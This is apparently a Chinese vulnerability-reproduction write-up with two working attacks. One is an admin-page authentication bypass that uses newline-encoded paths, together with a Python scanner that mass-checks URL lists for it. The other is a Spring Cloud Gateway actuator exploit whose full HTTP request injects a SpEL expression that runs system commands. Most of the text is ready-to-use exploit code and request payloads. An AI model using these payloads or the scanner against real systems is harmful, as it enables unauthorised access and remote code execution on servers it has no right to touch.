一、环境启动
web服务
正常访问admin页面,因为没有经过身份认证,会被禁止;加上换回车符\n后正则表达式不会匹配;
将换行符\n用%0d代替,就能绕过正则表达式匹配,成功访问admin页面
/admin/%0d
import argparse
import requests
# 创建命令行参数解析器
parser = argparse.ArgumentParser(description='Example script to process command line arguments.')
# 添加命令行选项
parser.add_argument('-u', '--url', help='URL argument,eg:http://192.168.1.1:port')
parser.add_argument('-f', '--file', help='FILE argument,eg:url.txt')
# 解析命令行参数
args = parser.parse_args()
# 获取URL或URL文件
url = args.url
file = args.file
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
payload = '/admin/%0a%0d'
def exploit_file(file):
with open(file, 'r') as urls:
for url in urls:
url = url.replace('\n', "")
if url.endswith('/'):
url = url.rstrip('/')
if not url.strip(): # 检查是否为空行
continue
url_check = url + payload
response = requests.get(url=url_check, headers=header, timeout=3)
if response.status_code == 200:
print(url + " Vulnerability exists!")
def exploit_url(url):
if url.endswith('/'):
url = url.rstrip('/')
url_check = url + payload
response = requests.get(url=url_check, headers=header, timeout=3)
if response.status_code == 200:
print(url + " Vulnerability exists!")
def process_input(args):
if args.url is None:
# 参数是一个文件路径
exploit_file(file)
elif args.file is None:
# 参数是一个URL
exploit_url(url)
else:
# 错误情况:两者都提供了参数
raise ValueError("Please provide the -u or -f parameter")
if __name__ == '__main__':
process_input(args)
参数选项 【-u】指定目标url
【-f】指定url合集(前提是同一目录下需要有url.txt文件)
python poc.py -u
python poc.py -f
执行后会返回漏洞情况,漏洞存在返回“Vulnerability exists!”,漏洞不存在则报错。
环境启动
首先,修改GET /actuator请求,确定actuator端口已经开启
修改get请求,获取路由信息GET /actuator/gateway/routes/
然后,构造一个post请求包,POST /actuator/gateway/routes/hackest 添加一个包含恶意SpEL表达式的路由:
POST /actuator/gateway/routes/hackest HTTP/1.1
Host: 192.168.245.131:8080
Cache-Control:max-age=0
Upgrade-Insecurce-Requests:1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:application/json
Content-Length: 361
{
"id": "wuyaaq",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
"name": "cmd"
}
}
],
"uri": "http://example.com:80",
"order": 0
}
刷新过滤器POST /actuator/gateway/refresh
访问过滤器ID